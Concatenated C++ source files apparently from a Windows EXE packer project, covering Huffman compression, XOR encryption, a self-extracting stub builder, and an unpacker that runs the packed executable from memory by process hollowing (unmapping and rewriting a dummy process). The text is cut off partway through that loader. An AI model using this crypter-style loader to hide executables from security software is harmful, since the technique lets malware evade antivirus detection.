-------------------------------------------------------------------------------- /unpacker/src/HuffmanD.cpp: -------------------------------------------------------------------------------- 1 | #include "HuffmanD.h" 2 | 3 | /******************************************************************** 4 | The constructor for the HuffmanD object. 5 | It will set the trees array with empty node. 6 | And the allocatedoutput is NULL, so that the function getOutput() 7 | will return NULL/false if there is nothing being compressed. 8 | *********************************************************************/ 9 | HuffmanD::HuffmanD(){ 10 | stepscount = 0; 11 | treescount = 0; 12 | 13 | for (register int i = 0; i < 256; i++){ 14 | *(trees+i) = new node(); 15 | *(trees_backup+i) = *(trees+i); 16 | *(leaves+i) = *(trees+i); 17 | *(STEPS+i) = 0; 18 | } 19 | memset(nodes, 0, 256*sizeof(node)); 20 | allocatedoutput = NULL; 21 | } 22 | 23 | 24 | /******************************************************************** 25 | This function will decompress the file. It will first get the 26 | neccessary info on how to construct back the tree from the header 27 | of the Input file. 28 | This is how the structure of the Input file created by the 29 | compressor. 30 | [ The number of trees ] 31 | [ Characters ] 32 | [ The deepness of the tree ] 33 | [ Output size ] 34 | 35 | *********************************************************************/ 36 | int HuffmanD::Decompress(UCHAR *input, int inputlength){ //input = file content, inputlenght = file size. 37 | UCHAR *stop = input + inputlength; //points to the last byte of file 38 | register UCHAR *inptr = input; //inptr will be used to navigate inside the array 39 | 40 | treescount = *inptr; // get the treescount from the file header 41 | inptr++; 42 | treescount++; // trees count is always +1 43 | 44 | node **tptr = trees; 45 | int outsize; 46 | 47 | //gets all the char from the input file 48 | for (register int i = 0; i < treescount; i++){ 49 | (*tptr)->chr = *inptr; 50 | inptr++; // go forward 51 | tptr++; 52 | } 53 | //printf("treescount: %d\n", treescount); 54 | 55 | stepscount = *inptr; 56 | //printf("stepscount: %d\n", stepscount); 57 | 58 | inptr++; 59 | int *sptr = STEPS; 60 | for (register int i = 0; i < stepscount; i++){ 61 | (*sptr) = *inptr; 62 | inptr++; 63 | sptr++; 64 | } 65 | 66 | //printf("outsize = *inptr << 24: %d\n", *inptr << 24); 67 | //printf("outsize ^= *(inptr+1) << 16: %d\n", *(inptr+1) << 16); 68 | //printf("outsize ^= *(inptr+2) << 8: %d\n", *(inptr+2) << 8); 69 | //printf("outsize ^= *(inptr+3): %d\n", *(inptr+3)); 70 | 71 | outsize = *inptr << 24; // xor 72 | outsize ^= *(inptr+1) << 16; 73 | outsize ^= *(inptr+2) << 8; 74 | outsize ^= *(inptr+3); 75 | inptr+=4; 76 | //printf("outsize: %d\n", outsize); 77 | 78 | allocatedoutput = new UCHAR[outsize+10]; // allocate output 79 | 80 | MakeHuffmanTree(); 81 | 82 | setCodeAndLength(*trees, 0,0); // initialize leaves - set their codes and code lengths 83 | 84 | register UCHAR *outptr = allocatedoutput; 85 | int bit = 0; 86 | register node *nptr ; 87 | register int b; 88 | while(inptr <= stop){ // decompress 89 | nptr = *trees; // root 90 | while(nptr->codelength == 0){ 91 | b = ((*inptr) >> bit) &1; 92 | nptr = (b > 0) ? nptr->right : nptr->left; 93 | inptr+=( (bit >> 2) & (bit >> 1) & bit) & 1; 94 | bit++; 95 | bit&=7; 96 | } 97 | (*outptr) = nptr->chr; 98 | outptr ++; 99 | } 100 | 101 | return outsize; 102 | } 103 | 104 | /******************************************************************** 105 | Generate the big huffman tree with the nodes in the trees array 106 | 107 | In the while loop below, 108 | It will create a new node and store it in the nodes array, 109 | which stores the two nodes taken from the trees in reversed order 110 | and the sum of total count of its child. 111 | 112 | It will try to relocate the node that inside the tree to a better 113 | place. 114 | *********************************************************************/ 115 | void HuffmanD::MakeHuffmanTree(){ 116 | node *n; 117 | node *nptr2 = nodes; 118 | node **backupptr; 119 | node **tptr = trees; 120 | stepscount = 0; 121 | while (treescount > 1) // merge trees until only 1 remains 122 | { 123 | n = nptr2; 124 | nptr2++; 125 | tptr = trees+treescount; 126 | backupptr = trees_backup+treescount; 127 | 128 | n->right = *(tptr-2); 129 | n->left = *(tptr-1); 130 | 131 | //preparing pointers for the next loop 132 | *(tptr-1) = *(backupptr-1); 133 | *(tptr-2) = n; 134 | treescount--; 135 | 136 | moveTreesToRight(trees+(*(STEPS+stepscount))); //move the nodes based on the frequency. 137 | stepscount++; 138 | } 139 | } 140 | 141 | /******************************************************************** 142 | This function will set the code and path to the last leaf if 143 | each tree. 144 | For example: HUFFMAN 145 | Char Count Code CodeLenght 146 | H 1 000 3 147 | U 1 100 3 148 | F 2 10 2 149 | M 1 01 2 150 | A 1 011 3 151 | N 1 111 3 152 | 153 | 6 154 | 0/ \1 155 | 3 3 156 | 0/ \ / \1 157 | 2 \ 0/ 2 158 | 0/ \1 \1 / 0/ \1 159 | H U F M A N 160 | *********************************************************************/ 161 | void HuffmanD::setCodeAndLength(node *n, int path, int level){ 162 | bool leaf = true; 163 | if (n->right){ 164 | setCodeAndLength(n->right, path ^ (1 << level), level+1); 165 | leaf = false; 166 | } 167 | if (n->left){ 168 | setCodeAndLength(n->left, path, level+1); 169 | leaf = false; 170 | } 171 | if (leaf){ //the last leaf that is H,U,F,M,A,N 172 | n->codelength = level; 173 | n->code = path; 174 | } 175 | } 176 | 177 | /******************************************************************** 178 | Exchange the location of the node in the parameter with 179 | the node at the end of the tree 180 | *********************************************************************/ 181 | void HuffmanD::moveTreesToRight(node **toTree){ 182 | node *a, *b; 183 | register node **ptr = trees+treescount-1; 184 | register node **_toTree = toTree; 185 | while (ptr > _toTree){ 186 | a = *(ptr-1); 187 | b = *(ptr); 188 | *(ptr-1) = b; 189 | *(ptr) = a; 190 | ptr--; 191 | } 192 | } 193 | 194 | /******************************************************************** 195 | return the output pointer 196 | *********************************************************************/ 197 | UCHAR *HuffmanD::getOutput(){ 198 | if (allocatedoutput) 199 | return allocatedoutput; 200 | return NULL; 201 | } 202 | -------------------------------------------------------------------------------- /packer/src/huffman.cpp: -------------------------------------------------------------------------------- 1 | #include "huffman.h" 2 | 3 | /******************************************************************** 4 | The constructor for the huffman object. 5 | It will set the trees array with empty node. 6 | And the allocatedoutput is NULL, so that the function getOutput() 7 | will return NULL/false if there is nothing being compressed. 8 | *********************************************************************/ 9 | huffman::huffman(){ 10 | stepscount = 0; 11 | treescount = 0; 12 | 13 | for (register int i = 0; i < 256; i++){ 14 | *(trees+i) = new node(); 15 | *(trees_backup+i) = *(trees+i); 16 | *(leaves+i) = *(trees+i); 17 | *(STEPS+i) = 0; 18 | } 19 | memset(nodes, 0, 256*sizeof(node)); 20 | allocatedoutput = NULL; 21 | } 22 | 23 | /******************************************************************** 24 | This function will compress the unsigned char array that is 25 | being pass in in the parameter. You can get the compressed 26 | version of the unsigned char array by calling the getOutput() 27 | function. 28 | This function will return the compressed size. 29 | *********************************************************************/ 30 | int huffman::Compress(UCHAR *input, int inputlength){ //input = file content, inputlenght = file size. 31 | register UCHAR *inptr = input; 32 | UCHAR *stop = input+inputlength; // ptr to the end of input file 33 | allocatedoutput = new UCHAR[5*inputlength]; 34 | 35 | allocatedoutput = allocatedoutput; 36 | int byteswritten = 0; 37 | register UCHAR *outptrX = allocatedoutput; 38 | 39 | /******************************************************************** 40 | Get the Count for each Character. Store it in the trees array 41 | *********************************************************************/ 42 | //printf("Char\tCount\n"); 43 | while (inptr != stop){ 44 | //ptr to location of array of nodes-> variable 45 | (*(trees+*inptr))->count++; 46 | (*(trees+*inptr))->chr = (*inptr); 47 | 48 | //printf("%c\t%d\n", (*inptr), (*(trees+*inptr))->count); 49 | inptr++; 50 | } 51 | 52 | /******************************************************************** 53 | Sort the arrays by the highest count/frequency first 54 | *********************************************************************/ 55 | qsort(trees, 256, sizeof(node*), compareFrequency); 56 | 57 | /******************************************************************** 58 | Write down treescount at the begining of the output file 59 | (for decompression) 60 | *********************************************************************/ 61 | for (register int i = 0; i < 256; i++) // get the trees count 62 | if ((*(trees+i))->count > 0) 63 | treescount++; 64 | else break; 65 | 66 | //printf("\ntresscount:%d\n", treescount); 67 | (*outptrX) = treescount-1; 68 | ++outptrX; 69 | 70 | /******************************************************************** 71 | Write down all the characther exist in the tree. Only one of it. 72 | NO DUPLICATIONS. 73 | *********************************************************************/ 74 | for (register int i = 0; i < treescount; i++){ 75 | *outptrX = (*(trees+i))->chr; 76 | //printf("%c\t%c \n", (*(outptrX)), (*(trees+i))->chr); 77 | ++outptrX; 78 | } 79 | 80 | /******************************************************************** 81 | Make Huffman Tree and write the stepscounts to outPtrX 82 | *********************************************************************/ 83 | MakeHuffmanTree(); 84 | 85 | // write steps 86 | //printf("stepscount:%d\n", stepscount); 87 | *outptrX = stepscount; 88 | outptrX++; 89 | 90 | for (register int i = 0; i < stepscount; i++){ 91 | *outptrX = *(STEPS+i); 92 | outptrX++; 93 | } 94 | 95 | /******************************************************************** 96 | Write the original input file size. 97 | By using BitShift, it helps to decrese the size to store it. 98 | *********************************************************************/ 99 | //printf("inputlength >> 24: %d\n", inputlength >> 24); 100 | //printf("inputlength >> 16: %d\n", inputlength >> 16); 101 | //printf("inputlength >> 8: %d\n", inputlength >> 8); 102 | //printf("inputlength: %d\n", inputlength); 103 | 104 | *outptrX = inputlength >> 24; // write original stream's length 105 | *(outptrX+1) = inputlength >> 16; 106 | *(outptrX+2) = inputlength >> 8; 107 | *(outptrX+3) = inputlength; 108 | outptrX+=4; 109 | 110 | /******************************************************************** 111 | Create leaves with the proper code and codelength 112 | *********************************************************************/ 113 | setCodeAndLength(*trees, 0,0); // assign code and codelenght to the leaf 114 | 115 | // compression 116 | int bitpath, bitswritten, outbitswritten = 0; 117 | register int i, bitcount; 118 | 119 | /******************************************************************** 120 | Writing the code and code length to each char into outPtrX 121 | *********************************************************************/ 122 | inptr = input; //inptr pointing to the start of the EXE file 123 | *outptrX = 0; 124 | while (inptr != stop){ 125 | bitpath = (*(leaves+*inptr))->code; 126 | bitcount = (*(leaves+*inptr))->codelength; 127 | bitswritten =0; 128 | for (i = 0; i < bitcount; i++){ 129 | //printf("((bitpath >> bitswritten)&1) << outbitswritten: %d\n", ((bitpath >> bitswritten)&1) << outbitswritten); 130 | (*outptrX) ^= ((bitpath >> bitswritten)&1) << outbitswritten; 131 | bitswritten++; 132 | (*(outptrX+1)) = '\0'; //null ptr 133 | outptrX += ((outbitswritten >> 2) & (outbitswritten >> 1) & outbitswritten) &1; 134 | outbitswritten++; // bytes written growing with each 8 written bits ^^ 135 | outbitswritten&=7; 136 | } 137 | inptr++; 138 | } 139 | 140 | /******************************************************************** 141 | Get the amount of bytes written. The size of the 142 | Compressed data. 143 | *********************************************************************/ 144 | byteswritten = outptrX - allocatedoutput; 145 | if (bitswritten > 0) // if necessary, increase the bytes written 146 | byteswritten++; // e.g. if written 1 bit, even 1 bit needs whole byte 147 | return byteswritten; 148 | } 149 | 150 | /******************************************************************** 151 | Generate the big huffman tree with the nodes in the trees array 152 | 153 | In the while loop below, 154 | It will create a new node and store it in the nodes array, 155 | which stores the two nodes taken from the trees in reversed order 156 | and the sum of total count of its child. 157 | 158 | It will try to relocate the node that inside the tree to a better 159 | place. 160 | *********************************************************************/ 161 | void huffman::MakeHuffmanTree(){ 162 | register node *n; 163 | register node **endtree = trees+treescount-1; //pointer to end of trees 164 | memset(nodes, 0, sizeof(node)*256); 165 | node *nptr = nodes; 166 | node **backupptr = trees_backup+treescount-1; 167 | while (treescount > 1){ // while trees count is > than > 1 168 | n = nptr; //ptr to new node from Nodes array 169 | nptr++; 170 | 171 | n->right = *(endtree-1); //right is usually hold the higher frequency 172 | n->left = *endtree; //left is usually the lesser frequency 173 | 174 | // the sum of total count from both left and right node are summed and assigned to new tree 175 | n->count = n->right->count + n->left->count; 176 | 177 | //assigning pointers to prepare for the next loop 178 | *endtree = *backupptr; 179 | *(endtree-1) = n; 180 | --treescount; 181 | --endtree; 182 | --backupptr; 183 | *(STEPS+stepscount) = treescount; 184 | 185 | //try to relocate the nodes in the trees array 186 | tryToRelocate(); 187 | stepscount++; 188 | } 189 | } 190 | 191 | /******************************************************************** 192 | This function will set the code and path to the last leaf if 193 | each tree. 194 | For example: HUFFMAN 195 | Char Count Code CodeLenght 196 | H 1 000 3 197 | U 1 100 3 198 | F 2 10 2 199 | M 1 01 2 200 | A 1 011 3 201 | N 1 111 3 202 | 203 | 6 204 | 0/ \1 205 | 3 3 206 | 0/ \ / \1 207 | 2 \ 0/ 2 208 | 0/ \1 \1 / 0/ \1 209 | H U F M A N 210 | *********************************************************************/ 211 | void huffman::setCodeAndLength(node *n, int path, int level){ 212 | bool leaf = true; 213 | if (n->right){ 214 | setCodeAndLength(n->right, path ^ (1 << level), level+1); 215 | leaf = false; 216 | } 217 | if (n->left){ 218 | setCodeAndLength(n->left, path, level+1); 219 | leaf = false; 220 | } 221 | if (leaf){ //the last leaf that is H,U,F,M,A,N 222 | n->codelength = level; 223 | n->code = path; 224 | } 225 | } 226 | 227 | /******************************************************************** 228 | Try to move the all nodes to a better location in the tree 229 | based on the frequency. 230 | *********************************************************************/ 231 | void huffman::tryToRelocate(){ 232 | register node **ptr = trees+treescount-2; 233 | register node **ourtree = trees+treescount-1; 234 | register node **begin = trees; 235 | while(ptr >= begin){ 236 | if (ourtree != ptr) 237 | if (((*ptr)->count > (*ourtree)->count) || (ptr == begin)){ 238 | moveTreesToRight(ptr); 239 | return; 240 | } 241 | ptr--; 242 | } 243 | } 244 | 245 | /******************************************************************** 246 | Exchange the location of the node in the parameter with 247 | the node at the end of the tree 248 | *********************************************************************/ 249 | void huffman::moveTreesToRight(node **toTree){ 250 | node *a, *b; 251 | register node **ptr = trees+treescount-1; 252 | register node **_toTree = toTree; 253 | node **end = trees+treescount; 254 | while (ptr > _toTree){ 255 | a = *(ptr-1); 256 | b = *(ptr); 257 | if (a->count >= b->count) { 258 | *(STEPS+stepscount) = treescount-(end-ptr); 259 | return; 260 | } 261 | *(ptr-1) = b; 262 | *(ptr) = a; 263 | ptr--; 264 | } 265 | *(STEPS+stepscount) = treescount-(end-ptr); 266 | } 267 | 268 | 269 | /******************************************************************** 270 | return the output pointer 271 | *********************************************************************/ 272 | UCHAR *huffman::getOutput(){ 273 | if (allocatedoutput) 274 | return allocatedoutput; 275 | return NULL; 276 | } 277 | 278 | /******************************************************************** 279 | This function will sort the trees array in the highest 280 | frequency first 281 | *********************************************************************/ 282 | int huffman::compareFrequency(const void *A, const void *B){ // sorting, we want to sort descending 283 | if((*(node**)A)->count == (*(node**)B)->count) // A->count == B->count ? 284 | return 0; 285 | return (*(node**)A)->count < (*(node**)B)->count ? 1 : -1;// no? so if A->count < B->count give 1 else -1 286 | } 287 | -------------------------------------------------------------------------------- /packer/src/packingInfo.cpp: -------------------------------------------------------------------------------- 1 | /******************************************************************** 2 | #INCLUDE 3 | *********************************************************************/ 4 | #include "packingInfo.h" 5 | 6 | /******************************************************************** 7 | GLOBAL VARIABLES 8 | *********************************************************************/ 9 | const char *PEerrors_str[] = 10 | { 11 | "Success", 12 | "Archive empty; no files to extract", 13 | "File in supplied path not found", 14 | "Could not create output archive file", 15 | "Failed to open one of the files", 16 | "Invalid Paramter", 17 | "Input file is not a valid executable file" 18 | }; 19 | 20 | const char *Parameter_str[] = 21 | { 22 | "None", 23 | "Compression Selected", 24 | "Encrytion Selected", 25 | "Compression and Encryption Selected" 26 | }; 27 | 28 | /******************************************************************** 29 | this is the unpackerstub. it will be added together with 30 | the BIN archive to make it into a self-extracting exe file 31 | *********************************************************************/ 32 | const char unpackerStub[] = "unpackerLoadEXE.exe"; 33 | 34 | /******************************************************************** 35 | FUNCTION DEFINITION 36 | *********************************************************************/ 37 | 38 | /******************************************************************** 39 | This function will pack the input EXE file into one 40 | self-executable file. 41 | 42 | This is how the structure of the exe file look like st the end 43 | [ Unpacker stub ] 44 | [ BIN signature ] 45 | [ pdata ] 46 | [ Image EXE ] 47 | *********************************************************************/ 48 | int packFileIntoArchive(int count, char *argv[]){ 49 | char *sPath = argv[1], *dPath = argv[2]; 50 | 51 | 52 | /******************************************************************** 53 | pdata is a structure that holds the filename and size. 54 | *********************************************************************/ 55 | packdata_t pdata; 56 | 57 | printf("Input Path: %s " 58 | "\nOutput Path: %s \n\n", 59 | sPath, dPath); 60 | 61 | //check if the input path is valid 62 | if(GetFileAttributes(sPath) == INVALID_FILE_ATTRIBUTES) 63 | return PEerrorPath; //fail to go there 64 | 65 | //checking if the input file is a valid EXE 66 | if(validExeFile(sPath) == PEerrorInputNotEXE) 67 | return PEerrorInputNotEXE; 68 | 69 | //store files headers. name and size 70 | HANDLE hFile = CreateFile(sPath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 71 | 0, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, 0); 72 | DWORD fileSize = GetFileSize(hFile, NULL); 73 | CloseHandle(hFile); 74 | 75 | /******************************************************************** 76 | INSERTING FILE INFO INTO pdata 77 | *********************************************************************/ 78 | char Path[MAX_PATH]; 79 | char *filename[4096]; 80 | 81 | GetFullPathName(sPath, 4096, Path, filename); 82 | 83 | // clear data to be safe 84 | memset(&pdata, 0, sizeof(pdata)); 85 | 86 | //fill packdata entry with file name and size filesizelow 87 | strcpy(pdata.filename, *filename); 88 | pdata.filesize = fileSize; 89 | 90 | /******************************************************************** 91 | CREATING THE OUTPUT EXE FILE 92 | *********************************************************************/ 93 | /******************************************************************** 94 | 1. Check for unpackerstub if in its your root folder 95 | *********************************************************************/ 96 | //does the unpacker stub exist in same directory as you? 97 | if(GetFileAttributes(unpackerStub) == INVALID_FILE_ATTRIBUTES){ 98 | printf("Unpacker stub exe not found!\n"); 99 | return 0; 100 | } 101 | 102 | //append .exe if the user didnt put it 103 | if (dPath[strlen(dPath)-1] != 'e') 104 | strcat(dPath, ".exe"); 105 | 106 | /******************************************************************** 107 | 2. Copy the stub into a new EXE file 108 | *********************************************************************/ 109 | //CopyFile( existing, new, false) false = haven't create the new file 110 | if (!CopyFile(unpackerStub, dPath, FALSE)){ //if return fail or 0 111 | printf("Could not create SFX file!\n"); 112 | return PEerrorCannotCreateArchive; 113 | } 114 | 115 | //open the exe file for updating in binary 116 | FILE *packedEXE = fopen(dPath, "rb+"); 117 | //FILE *packedEXE = fopen(dPath, "wb"); 118 | 119 | //seek the last location 120 | fseek(packedEXE, 0, SEEK_END); 121 | 122 | /******************************************************************** 123 | 3. Create a signature 124 | *********************************************************************/ 125 | //capture and store it 126 | long stubSize = ftell(packedEXE); 127 | 128 | //write signature . for the unpacker to identify if this is a valid archive for him 129 | long myPEsignature = 'AFIF'; 130 | 131 | //how fwrite works? 132 | //fwrite(pointer to input, size to be written, nember of elements, output file) 133 | fwrite(&myPEsignature, sizeof(myPEsignature), 1, packedEXE); 134 | 135 | /******************************************************************** 136 | 4. Reading the command line parameters 137 | *********************************************************************/ 138 | int parameter = 0; 139 | 140 | if(count == 3) 141 | parameter = PREmpty; 142 | else if(string(argv[3]) == "-c") 143 | parameter = PRCompression; 144 | else if(string(argv[3]) == "-e") 145 | parameter = PREncrpytion; 146 | else if(string(argv[3]) == "-ce") 147 | parameter = PRBoth; 148 | else 149 | return PEerrorInvalidParameter; 150 | 151 | //get the key for the XOR encryption if provided 152 | int key = 0; 153 | bool keyProvided = 0; 154 | if(count == 5){ 155 | key = atoi(argv[4]); //will return 0 if its not a number in the argv[4] 156 | if(key == 0){ 157 | return PEerrorInvalidParameter; 158 | } 159 | keyProvided = 1; 160 | } 161 | /******************************************************************** 162 | 5. Encypt and/or Compress the input file 163 | *********************************************************************/ 164 | FILE *inFile = fopen(sPath, "rb"); 165 | huffman *huf = new huffman(); 166 | UCHAR *input, *output, *encryptedInput; 167 | long size; 168 | int outSize; 169 | 170 | //get the size 171 | size = pdata.filesize; 172 | input = new UCHAR[size]; 173 | encryptedInput = new UCHAR[size]; 174 | 175 | //fill the array with the content inside the file. 176 | fread(input, 1, size, inFile); 177 | 178 | printf("Option: %s\n", Parameter_str[parameter]); 179 | switch(parameter){ 180 | case 0: 181 | outSize = size; 182 | output = input; 183 | break; 184 | case 1: //compression only 185 | printf("\nCompressing >>>> '%s' [%lu]\n", pdata.filename, pdata.filesize); 186 | outSize = huf->Compress(input, size); 187 | printf("Compressed Size: %d\n",outSize); 188 | 189 | output = huf->getOutput(); 190 | break; 191 | case 2: //encryption only 192 | printf("\nEncrypting >>>> '%s'\n", pdata.filename); 193 | //call the compress function 194 | if(keyProvided == 0) 195 | output = encryptFile(input, size); 196 | else 197 | output = encryptFile(input, size, key); 198 | outSize = size; 199 | break; 200 | case 3://both 201 | printf("\nEncrypting >>>> '%s'\n", pdata.filename); 202 | 203 | //call the compress function 204 | if(keyProvided == 0) 205 | encryptedInput = encryptFile(input, size); 206 | else 207 | encryptedInput = encryptFile(input, size, key); 208 | 209 | //call compress function 210 | printf("\nCompressing >>>> '%s' [%lu]\n", pdata.filename, pdata.filesize); 211 | outSize = huf->Compress(encryptedInput, size); 212 | printf("Compressed Size: %d\n",outSize); 213 | 214 | output = huf->getOutput(); 215 | break; 216 | } 217 | 218 | /******************************************************************** 219 | 4. Copy the pdata and the compressed data 220 | *********************************************************************/ 221 | printf("\nWriting >>>> '%s' [%i]\n", pdata.filename, outSize); 222 | pdata.filesize = outSize; 223 | pdata.key = key; 224 | pdata.parameter = parameter; 225 | 226 | //pdata 227 | fwrite(&pdata,sizeof(pdata), 1, packedEXE); 228 | //compressed data 229 | fwrite(output, outSize, 1, packedEXE); 230 | 231 | fclose(inFile); 232 | fclose(packedEXE); 233 | 234 | /******************************************************************** 235 | 7. Edit dos header to mark archive starting positing in exe. 236 | *********************************************************************/ 237 | setInsertPosition(dPath, stubSize); 238 | 239 | printf("File created: %s\n", dPath); 240 | return PESuccess; 241 | } 242 | 243 | /******************************************************************** 244 | This function will edit the new EXE dos header to mark 245 | the starting position of the packed image EXE inside it by 246 | editing the reserved e_res2 247 | *********************************************************************/ 248 | int setInsertPosition(char *filename, long pos){ 249 | //open the file for reading and updating in binary 250 | FILE *packArchive = fopen(filename, "rb+"); 251 | if (packArchive == NULL) 252 | return PEerrorCouldNotOpenArchive; 253 | 254 | //to capture the header 255 | IMAGE_DOS_HEADER idh; 256 | 257 | // read dos header and save it to idh 258 | fread((void *)&idh, sizeof(idh), 1, packArchive); 259 | 260 | //overwrite the e_res2 with pos(starting position of archive) 261 | *(long *)&idh.e_res2[0] = pos; 262 | 263 | //update header 264 | rewind(packArchive); 265 | fwrite((void *)&idh, sizeof(idh), 1, packArchive); 266 | fclose(packArchive); 267 | return PESuccess; 268 | } 269 | 270 | /******************************************************************** 271 | This function will check if the input EXE file is a valid 272 | EXE file 273 | *********************************************************************/ 274 | int validExeFile(const char *sPath){ 275 | FILE *fp = fopen(sPath, "rb"); 276 | UCHAR *content; 277 | 278 | fseek(fp, 0, SEEK_END); 279 | int size = ftell(fp); 280 | fseek(fp, 0, SEEK_SET); 281 | 282 | content = (UCHAR *) malloc (size*sizeof(UCHAR)); 283 | fread(content, size, 1, fp); 284 | 285 | printf("Checking %s \n", sPath); 286 | 287 | fclose(fp); 288 | 289 | IMAGE_DOS_HEADER image_dos_header; //Line 2926 290 | IMAGE_NT_HEADERS image_nt_header; //Line 2981 291 | 292 | // Grab the DOS Headers 293 | memcpy(&image_dos_header,content,sizeof(image_dos_header)); 294 | 295 | // Checking for dos signature 296 | if(image_dos_header.e_magic != IMAGE_DOS_SIGNATURE){ 297 | printf("DOS Signature (MZ): INVALID\n\n"); 298 | return PEerrorInputNotEXE; 299 | } printf("DOS signature (MZ): VALID\n"); 300 | 301 | // Grab NT Headers 302 | memcpy(&image_nt_header,(LPVOID)((long int)content+image_dos_header.e_lfanew),sizeof(image_nt_header)); 303 | 304 | // Checking for NT sigmature 305 | if(image_nt_header.Signature != IMAGE_NT_SIGNATURE){ 306 | printf("PE Signature (PE00): INVALID\n\n\n"); 307 | return PEerrorInputNotEXE; 308 | }else{ 309 | printf("PE Signature (PE00): VALID\n\n\n"); 310 | return 1; 311 | } 312 | } 313 | -------------------------------------------------------------------------------- /unpacker/src/loadEXE.cpp: -------------------------------------------------------------------------------- 1 | /******************************************************************** 2 | #INCLUDE 3 | *********************************************************************/ 4 | #include "loadEXE.h" 5 | 6 | /******************************************************************** 7 | GLOBAL VARIABLES 8 | *********************************************************************/ 9 | const char *PEerrors_str[] ={ 10 | "Success", 11 | "Archive empty; no files to extract", 12 | "File in supplied path not found", 13 | "Not a valid packed file", 14 | "Failed while extracting one of the files", 15 | "Input archive file failed to open", 16 | "Unable to start a dummy process", 17 | "Packed file is not a valid executable file", 18 | "Unable to Write Process Memory" 19 | }; 20 | 21 | 22 | /******************************************************************** 23 | FUNCTION DEFINITION 24 | *********************************************************************/ 25 | /******************************************************************** 26 | This function will unpack the files inside you. 27 | It will then call the function LoadEXE(LPVOID) to 28 | run the EXE from memory 29 | *********************************************************************/ 30 | int unpackFiles(char *binFile, long startPosition, char *pPath){ 31 | //open binfile in binary to read 32 | FILE *packArchive = fopen(binFile, "rb"); 33 | 34 | //not valid path to bin? 35 | if(!packArchive) 36 | return PEerrorCouldNotOpenArchive; 37 | 38 | //printf("startingPos: %l", startPosition); 39 | if (startPosition) //0 is false 40 | fseek(packArchive, startPosition, SEEK_SET); 41 | //startPosition = 0; 42 | 43 | long binSignature; //the variable name is too obvious 44 | packdata_t pdata; 45 | 46 | //read signature 'AFIF' 47 | //fread(ptr to store, size of each element, how many times to do this?, the file needs to be read) 48 | fread(&binSignature, sizeof(binSignature), 1, packArchive); 49 | if(binSignature != 'AFIF') 50 | return(fclose(packArchive), PEerrorNoSignatureFound); 51 | 52 | //read pdata in the bin file 53 | fread(&pdata, sizeof(packdata_t), 1, packArchive); 54 | 55 | //////////////////////////////////////////////////////////////////////// 56 | printf("Extracting >>>> %s [%li]\n", pdata.filename, pdata.filesize); 57 | 58 | //how big is the size to be written? 59 | long size = pdata.filesize; 60 | 61 | //preparing variables for decryption and/or decompression 62 | UCHAR *content, *decryptedContent, *output; 63 | int outsize; 64 | HuffmanD *huf; 65 | 66 | content = (UCHAR *) malloc (size*sizeof(UCHAR)); 67 | 68 | fread(content, size, 1, packArchive); 69 | fclose(packArchive); 70 | 71 | //check if user provided the key or is packer generated. 72 | bool keyProvided = 0; 73 | if(pdata.key != 0) 74 | keyProvided = 1; 75 | 76 | /******************************************************************** 77 | Decrypt and/or decompress the content 78 | *********************************************************************/ 79 | switch(pdata.parameter){ 80 | case 0: //none 81 | outsize = pdata.filesize; 82 | decryptedContent = content; 83 | break; 84 | case 1: //decompression 85 | printf("\nDecompressing >>>> %s \n", pdata.filename); 86 | huf = new HuffmanD(); 87 | outsize = huf->Decompress(content, pdata.filesize); 88 | 89 | output = huf->getOutput(); 90 | decryptedContent = output; 91 | break; 92 | case 2: //decryption 93 | printf("\nDecrypting >>>> %s \n", pdata.filename); 94 | 95 | //allocate array for decrypted content 96 | decryptedContent = (UCHAR *) malloc (size*sizeof(UCHAR)); 97 | if(keyProvided == 0) 98 | decryptedContent = decryptFile(content, size); 99 | else 100 | decryptedContent = decryptFile(content, size, pdata.key); 101 | outsize = pdata.filesize; 102 | break; 103 | case 3: //both 104 | //decompressing 105 | printf("\nDecompressing >>>> %s \n", pdata.filename); 106 | huf = new HuffmanD(); 107 | outsize = huf->Decompress(content, pdata.filesize); 108 | 109 | output = huf->getOutput(); 110 | 111 | //allocate array for decrypted content 112 | decryptedContent = (UCHAR *) malloc (outsize*sizeof(UCHAR)); 113 | 114 | //decrypting 115 | printf("\nDecrypting >>>> %s \n", pdata.filename); 116 | if(keyProvided == 0) 117 | decryptedContent = decryptFile(output, outsize); 118 | else 119 | decryptedContent = decryptFile(output, outsize, pdata.key); 120 | break; 121 | } 122 | 123 | printf("\nUnpacking Successful!\n\nExecuting from Memory >>>> %s [%i]\n", pdata.filename, outsize); 124 | LoadEXE(decryptedContent); 125 | 126 | return PESuccess; 127 | } 128 | 129 | /******************************************************************** 130 | This function will dynamically fork a process. 131 | lpImage contains the data/image of the EXE. 132 | *********************************************************************/ 133 | int LoadEXE(LPVOID lpImage){ 134 | /******************************************************************** 135 | Variables for Process Forking 136 | *********************************************************************/ 137 | ULONG lWritten; 138 | ULONG lHeaderSize; 139 | ULONG lImageSize; 140 | ULONG lSectionCount; 141 | ULONG lSectionSize; 142 | ULONG lFirstSection; 143 | ULONG lPreviousProtection; 144 | ULONG lJumpSize; 145 | 146 | LPVOID lpImageMemory; 147 | LPVOID lpImageMemoryDummy; 148 | 149 | IMAGE_DOS_HEADER dsDosHeader; 150 | IMAGE_NT_HEADERS ntNtHeader; 151 | IMAGE_SECTION_HEADER shSections[512 * 2]; 152 | 153 | PROCESS_INFORMATION piProcessInformation; 154 | STARTUPINFO suStartUpInformation; 155 | 156 | CONTEXT cContext; 157 | 158 | NtUnmapViewOfSectionF NtUnmapViewOfSection = (NtUnmapViewOfSectionF)GetProcAddress(LoadLibrary("ntdll.dll"),"NtUnmapViewOfSection"); 159 | /******************************************************************** 160 | Variables for Creating a Local Process 161 | *********************************************************************/ 162 | FILE* dummyInFile; 163 | char* dummyProcessName; 164 | 165 | long int dummySize; 166 | long int dummyImageBase; 167 | long int dummyImageSize; 168 | 169 | LPVOID dummyFile; 170 | 171 | IMAGE_DOS_HEADER dummyDosHeader; 172 | IMAGE_NT_HEADERS dummyNtHeader; 173 | /******************************************************************** 174 | Create and prepare a dummy process for Forking 175 | *********************************************************************/ 176 | dummyProcessName = new char[MAX_PATH]; 177 | //fills the dummyProcessName with zeros 178 | ZeroMemory(dummyProcessName,MAX_PATH); 179 | 180 | // Get the file name for the dummy process 181 | if(GetModuleFileName(NULL,dummyProcessName,MAX_PATH) == 0){ 182 | delete [] dummyProcessName; 183 | return PEerrorDummyProcessFail; 184 | } 185 | 186 | // Open the dummy process in binary mode 187 | dummyInFile = fopen(dummyProcessName,"rb"); 188 | if(!dummyInFile){ 189 | delete [] 